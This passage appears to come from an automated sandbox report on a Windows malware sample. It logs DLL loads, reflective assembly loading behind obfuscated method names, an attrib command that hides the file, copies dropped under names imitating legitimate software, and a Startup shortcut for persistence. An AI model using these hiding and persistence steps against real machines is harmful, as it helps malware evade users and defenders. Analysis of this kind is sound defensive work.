                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: amsi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: userenv.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: sxs.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mpr.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: linkinfo.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rasman.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                            Source: 3u8A2xjbBT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 3u8A2xjbBT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            Source: 3u8A2xjbBT.exe, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows multimedia platform.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows nt.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows photo viewer.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows portable devices.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows sidebar.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: autoit3.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windowspowershell.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: common files.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: google.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01662158 pushad ; iretd 0_2_01662159
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166B1FD push esp; retf 0_2_0166B1D3
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166B1C5 push esp; retf 0_2_0166B1D3
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166ABAE push ebx; iretd 0_2_0166ABAF
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01664453 push ebp; retf 0_2_01664454
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01660F29 push es; iretd 0_2_01660F2A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01660F33 push es; iretd 0_2_01660F34
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBE6364 pushad ; retf 0_2_0BBE63B9
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A12158 pushad ; iretd 15_2_02A12159
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A10F29 push es; iretd 15_2_02A10F2A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A10F33 push es; iretd 15_2_02A10F34
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A14453 push ebp; retf 15_2_02A14454
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01822158 pushad ; iretd 16_2_01822159
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01824453 push ebp; retf 16_2_01824454
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01820F29 push es; iretd 16_2_01820F2A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01820F33 push es; iretd 16_2_01820F34
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059AC941 push 9C059093h; ret 16_2_059AC94D
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49AB57 push E802005Eh; retf 16_2_0A49AB61
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49C954 push 850FD83Bh; ret 16_2_0A49C959
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A490FFA push 7000005Eh; ret 16_2_0A491001
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A4910A2 push 1800005Eh; retf 16_2_0A4910B1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A4910B2 push esp; iretd 16_2_0A491101

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\microsoft office.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows multimedia platform.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows nt.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\mozilla maintenance service.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows mail.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows sidebar.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows media player.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\autoit3.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windowspowershell.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\common files.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\google.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\java.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\internet explorer.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\msecache.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\reference assemblies.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows photo viewer.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\microsoft.net.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\microsoft.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows defender.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\jdownloader.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows portable devices.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\msbuild.exe

                            Boot Survival

                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnk
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
